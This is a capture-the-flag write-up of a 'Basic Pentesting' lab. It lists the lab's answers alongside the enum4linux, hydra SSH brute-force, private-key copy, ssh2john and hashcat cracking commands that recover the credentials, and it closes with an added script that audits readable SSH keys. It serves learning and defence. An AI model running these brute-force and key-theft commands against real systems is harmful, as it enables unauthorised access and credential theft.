Basic Pentesting

Task 1

Deploy the machine and connect to our network

Find the services exposed by the machine

What is the name of the hidden directory on the web server (enter name without /)?

development

User brute-forcing to find the username & password

What is the username?

enum4linux 10.10.252.28

jan

What is the password?

hydra -l jan -P ./webtools/rockyou.txt 10.10.252.28 ssh
[22][ssh] host: 10.10.252.28   login: jan   password: armando

What service do you use to access the server (answer in abbreviation in all caps)?

SSH

Enumerate the machine to find any vectors for privilege escalation

What is the name of the other user you found (all lower case)?

kay

If you have found another user, what can you do with this information?

What is the final password you obtain?

scp jan@10.10.252.28:/home/kay/.ssh/id_rsa ./
ssh2john id_rsa > 1.txt
hashcat -m 22931 1.txt -a 0 ./webtools/rockyou.txt --force

heresareallystrongpasswordthatfollowsthepasswordpolicy$$
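
The key copy above only works because jan can read /home/kay/.ssh/id_rsa. As an added example (not part of the original notes), this root-run audit lists private keys under a home tree that accounts other than the owner can read; the function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): list SSH private keys that
# accounts other than the owner can read. Run as root so every home is visible.
# Fix for any finding: chmod 600 on the key, chmod 700 on the .ssh directory.

# audit_keys ROOT -> one line per finding: "<EXPOSED|WEAK> <path>"
#   EXPOSED: key is group/other-readable and its directory is group/other-searchable
#   WEAK:    key is group/other-readable, but the directory itself blocks access
audit_keys() {
    root=${1:-/home}
    find "$root" -type f -path '*/.ssh/*' \( -perm -040 -o -perm -004 \) 2>/dev/null |
    while IFS= read -r f; do
        # Only private keys: first line is a PEM "PRIVATE KEY" header
        head -n 1 "$f" 2>/dev/null | grep -q -- '-----BEGIN .*PRIVATE KEY-----' || continue
        dir=$(dirname "$f")
        if [ -n "$(find "$dir" -prune \( -perm -010 -o -perm -001 \) -print)" ]; then
            echo "EXPOSED $f"
        else
            echo "WEAK $f"
        fi
    done
}

# make_sample_tree DIR: constructed home layout with placeholder (not real) keys
make_sample_tree() {
    for u in alice bob carol; do
        mkdir -p "$1/$u/.ssh"
        printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'CONSTRUCTED-PLACEHOLDER' \
            '-----END RSA PRIVATE KEY-----' > "$1/$u/.ssh/id_rsa"
    done
    chmod 755 "$1/alice/.ssh"; chmod 644 "$1/alice/.ssh/id_rsa"   # readable by anyone
    chmod 700 "$1/bob/.ssh";   chmod 600 "$1/bob/.ssh/id_rsa"     # correct
    chmod 700 "$1/carol/.ssh"; chmod 644 "$1/carol/.ssh/id_rsa"   # saved only by the directory
}

# Demo on the constructed tree (pass a real root such as /home to audit_keys instead)
tmp=$(mktemp -d)
make_sample_tree "$tmp"
audit_keys "$tmp"
rm -rf "$tmp"
```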